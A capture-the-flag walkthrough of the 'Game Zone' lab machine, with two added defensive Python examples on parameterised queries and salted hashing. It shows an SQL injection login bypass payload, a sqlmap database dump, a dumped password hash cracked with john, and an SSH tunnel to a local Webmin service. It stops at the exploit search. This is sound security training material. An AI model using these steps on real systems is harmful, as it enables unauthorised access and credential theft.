# Game Zone

###### tags: `vulnerableMachine` `linuxMachine`

[TOC]

## Recon

![](https://i.imgur.com/S4g1m7a.png)

## Login page (SQLi)

```
POST /index.php HTTP/1.1
Host: 10.10.16.37
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://10.10.16.37
Connection: close
Referer: http://10.10.16.37/index.php
Cookie: PHPSESSID=60n3p31cqtk77sasrt62fa5hd7
Upgrade-Insecure-Requests: 1

username=meow&password=meow&x=0&y=0
```

Login bypass: username = `' or 1=1 -- -`

Vulnerable page:

```
POST /portal.php HTTP/1.1
Host: 10.10.16.37
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.16.37
Connection: close
Referer: http://10.10.16.37/portal.php
Cookie: PHPSESSID=60n3p31cqtk77sasrt62fa5hd7
Upgrade-Insecure-Requests: 1

searchitem=meow
```

Save this request content to `request.txt`.

Goal: use sqlmap to retrieve the database.

Testing the vulnerable parameter (`-r` replays the saved request and tests its parameters):

![](https://i.imgur.com/QrdMYPn.png)

```
sqlmap -r request.txt --dbms=mysql --dump
```

Error-based injection:

![](https://i.imgur.com/6BLexAU.png)

### Testing result of sqlmap

![](https://i.imgur.com/e8KHBhc.png)

Tables:

-> POST table

![](https://i.imgur.com/jTgWpys.png)

-> USER table

![](https://i.imgur.com/qqrp7lP.png)

![](https://i.imgur.com/dg2y8Zi.png)

User name: `agent47`

Password hash: `ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14`

## John: crack the password hash

The dumped value is an unsalted SHA-256 digest, hence `--format=raw-sha256`:

```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha256
```
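The login bypass above works because the form's username is concatenated into the SQL string, so `' or 1=1 -- -` closes the quoted value and comments out the password check. The following is an added example (not code from the room or the writeup) that reproduces the defect against a constructed in-memory SQLite table and shows the parameterised form that closes it; the `users` schema and the `constructed-secret` credential are assumptions made for the demonstration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's user table (not the room's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('agent47', 'constructed-secret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: user input is parsed as SQL syntax, so a quote
    and a comment marker rewrite the WHERE clause."""
    query = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values as data, so the
    payload is compared literally against the username column."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


# The payload used against the login form above.
BYPASS = "' or 1=1 -- -"


def demo() -> dict:
    """Run both login implementations against the bypass payload and a
    legitimate credential; returns the outcomes for inspection."""
    conn = make_db()
    return {
        "vulnerable_bypass": login_vulnerable(conn, BYPASS, "anything"),
        "safe_bypass": login_safe(conn, BYPASS, "anything"),
        "safe_real": login_safe(conn, "agent47", "constructed-secret"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print("%-18s login accepted: %s" % (name, ok))
```

In the vulnerable path the executed statement becomes `... WHERE username = '' or 1=1 -- -' AND password = 'anything'`, which matches every row; the same input against the bound query matches nothing. Reviewing the PHP behind `index.php` and `portal.php` for string-built queries and moving them to prepared statements is the fix for both the login bypass and the `searchitem` injection sqlmap exploits.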
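The hash cracks quickly because it is a single unsalted SHA-256 over the password, so each wordlist entry costs one cheap hash and an identical password always produces an identical digest. This added example (not part of the writeup) shows that lookup against a constructed target, then the salted, iterated PBKDF2 storage that removes both weaknesses; the wordlist, the target digest and the iteration count are constructed for the demonstration, not the room's values.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Constructed stand-ins for rockyou.txt and the dumped hash (not the room's data).
WORDLIST = ["123456", "password", "letmein", "qwerty"]
CONSTRUCTED_TARGET = hashlib.sha256(b"letmein").hexdigest()


def crack_raw_sha256(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Unsalted SHA-256: one digest per candidate, no salt, no work factor.
    Returns the matching candidate or None if the wordlist is exhausted."""
    for candidate in wordlist:
        if hashlib.sha256(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


# Iteration count is an assumption for this example; tune to your hardware.
ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256, stored as 'pbkdf2$iters$salt$dk'.
    A fresh random salt means equal passwords no longer share a digest, and
    the iteration count makes each guess cost ITERATIONS hashes, not one."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2$%d$%s$%s" % (ITERATIONS, salt.hex(), dk.hex())


def verify_password(stored: str, password: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("raw sha256 lookup:", crack_raw_sha256(CONSTRUCTED_TARGET, WORDLIST))
    stored = hash_password("s3cret")
    print("stored record:", stored)
    print("verify correct:", verify_password(stored, "s3cret"))
    print("verify wrong:  ", verify_password(stored, "wrong"))
```

With the salted record, a wordlist attack must redo the full PBKDF2 work per user per guess, and a leaked table no longer reveals which accounts share a password.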
![](https://i.imgur.com/krL1Zad.png)

Catch the flag:

![](https://i.imgur.com/EvmOJOt.png)

## Exposing the service with SSH tunnels

[ssh tunnel](/a181FIrZSoK271Z5BFEJgw)

> How many TCP sockets are running?

```
netstat -ltp
```

![](https://i.imgur.com/ZoyEa2W.png)

Port 10000 is listening on localhost only.

Create an SSH tunnel (local port forward) so the service is reachable from the attacking machine:

```
ssh -N -L 4444:127.0.0.1:10000 agent47@10.10.16.37
```

`-N`: do not execute a remote command (forwarding only). `-L 4444:127.0.0.1:10000`: local port 4444 is forwarded to port 10000 on the target's loopback interface.

Browser -> `127.0.0.1:4444`

![](https://i.imgur.com/TOMBwbf.png)

## Privilege elevation

CMS: Webmin, target version: 1.580

Search for an exploit matching that version:

![](https://i.imgur.com/1xb6KkF.png)

![](https://i.imgur.com/Xap1BkQ.png)